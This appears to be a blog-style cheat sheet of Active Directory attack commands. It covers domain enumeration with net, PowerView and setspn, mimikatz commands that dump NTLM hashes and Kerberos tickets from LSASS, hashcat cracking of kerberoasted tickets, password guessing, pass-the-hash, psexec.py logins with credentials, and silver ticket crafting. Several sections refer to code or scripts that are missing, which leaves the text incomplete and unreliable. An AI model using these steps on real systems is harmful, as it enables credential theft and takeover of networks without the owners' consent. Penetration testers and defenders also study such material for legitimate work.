Here is a collection of commands, tools and scripts that you can use through the exploitation of an active directory.
There are 2 popular versions of mimikatz tool that work with different versions of Windows. Mimikatz - 2.1.1 and 2.2.0. I am yet to figure out the compatible versions and once I have them figured I will list it out here. Until then, if you get an error while trying to list passwords and tickets, then switch versions and try it out.
List of users & groups within the local system
net user
net group
List of shares in the local and remote machine
NET SHARE
NET VIEW \\ComputerName /All
List of users and groups within the domain
In order to be able to list the users and groups from the domain, you should be logged in as a user of that domain.
net user /domain
net group /domain
Details about a user - password profile, groups, etc.
net user alice /domain
List of users and their attributes
List of Logged in users
Import-Module .\PowerView.ps1
Get-NetLoggedon -ComputerName p42176 #for locally logged in users
Get-NetSession -ComputerName p42 #for domain logged in users
Alternatively, PsLoggedon executable can be used to retrieve the list when Powerview does not work due to permissions,
.\PsLoggedon.exe \\systemname
List of SPNs in the domain
Service Principle Names are names given to services that are hosted from within the domain. Enumerating them will us the IP address and Port of those services along with a list of other details.
Change the $Search.filter="samAccountType=805306368" to $Search.filter="serviceprincipalname=*http*"
Get-SPN -type service -search "*http*"
The native Windows tool setspn can also be used to get the list of SPNs,
setspn -L iis_service
Retreive User Password Hash from LSASS
We will use mimikatz executable to retrieve the password hashes and you need to have at least local administrator privilege to get the passwords,
This command can be used to list the local users along with their NTLM hash. This is all the more useful once you gain access to a domain controller to list all users belonging to that domain.
mimikatz.exe
privilege::debug
lsadump::lsa /patch
Retrieve TGT and TGS of Users & Services
The TGT and TGS of logged in users are stored in the LSASS.
mimikatz.exe
privilege::debug
sekurlsa::tickets
Export TGS to the drive & Crack it
We can export the TGS to the drive and then use John or Hashcat to crack the file. The mimikatz procedure is as follows, you will need to the know the SPN to retreive its ticket.
Once you have the file in hashcat format, the file can be cracked using hashcat,
hashcat -m 13100 -a 0 cracked.txt file.kirbi /usr/share/seclists/Passwords/Common-Credentials/file.txt
Slow User Password Guessing
One of the ways, though not the most effective, is to attempt logins with passwords to guess. We can automate this process using powershell scripts. However one thing to be kept in mind is number of wrong passwords before which an account will be locked. We can find it by,
net accounts
Lockout Threshold and Lockout Observation windows are 2 parameters to keep in mind before starting this attack.
This works only with NTLM hash on AD admin accounts and built in local admin accounts. This is merely a replacement for instead of logging in with passwords.
This works when you have another user logged on to the system using NTLM and would like to start an application in that user's context. Here we will get a powershell ticket and open the powershell application.
Ensure that a user already has a session using NTLM and get the password hash as shown under the section "Retreive User Password Hash from LSASS"
Then use the following code to get a Kerberos ticket for powershell
With this you should have a powershell open within the context of the user "administrator".
Generate TGT & TGS using Powershell Opened within User's Context
If you already have an powershell application open within the user's context, then you can request for a TGT and use it to further your attack. The following command is to authenticate to a network share,
net use \\p42
Note: Any command that seeks the permission of the DC can be used here.
You can check the generated ticket using the command "klist".
It is important to note that some systems accept only domain name and the same has to be included in the command instead of the IP address or loopback address.
Open a Cmd Prompt from the Linux System
This is Linux equivalent of the PsExec on Windows. This comes in handy when you have the username and password to gain command prompt control on a remote system. This requires the target machine to have SMB and write access to Admin$ share.
psexec.py p42/user123:hereisapassword@192.168.1.1
It is important to note that some systems accept only domain name and the same has to be included in the command instead of the IP address or loopback address.
Crafting a Silver Ticket in Kerberos
A silver ticket is a service ticket that is crafted by the user instead of the TGT. We will need the password hash of the service account that runs the service and Service ID (SID) of the user domain.
The rc4 parameter is to indicate the encryption algorithm to be used and the value is the key to the encryption, which here is the NTLM hash of that service account. The NTLM hash can be procured for the SPN by requesting a service ticket and then cracking it. Check out the "Export TGS to the drive and crack it" section.
script from github to list logged in users.
The same script used for enumerating can be used for SPNs with a slight modification.
Alternatively the script can also be used.
Once the ticket is exported, it can be cracked using ,
Invoke is a powershell script that takes care of identifying SPNs and exporting the kirbi files end-to-end.
We can use the script to try and guess the user password,
In order to be able to open a command prompt on a remote system within the context of a user, you should already have a powershell/cmd prompt in that users context in the local system. Then, the tool can be used to open the remote prompt.
